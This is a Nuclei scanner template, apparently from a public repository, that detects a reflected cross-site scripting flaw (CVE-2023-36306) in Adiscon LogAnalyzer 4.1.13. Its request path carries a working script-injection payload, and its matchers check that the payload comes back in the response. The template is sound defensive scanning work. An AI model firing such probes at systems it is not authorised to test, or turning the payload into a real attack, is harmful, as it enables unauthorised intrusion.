39 lines
1.4 KiB
YAML
39 lines
1.4 KiB
YAML
id: CVE-2023-36306
|
|
|
|
info:
|
|
name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51643
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-36306
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00385
|
|
epss-percentile: 0.73054
|
|
cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: adiscon
|
|
product: loganalyzer
|
|
tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100f97821e8560212cacd737cf3143cc95c35378c592396c0c7cca9d2e93acf482302210080da39a9593817aa30d0248c17f050014f39b550c97b784de33e60ea07a0c2e5:922c64590222798bb761d5b6d8e72950 |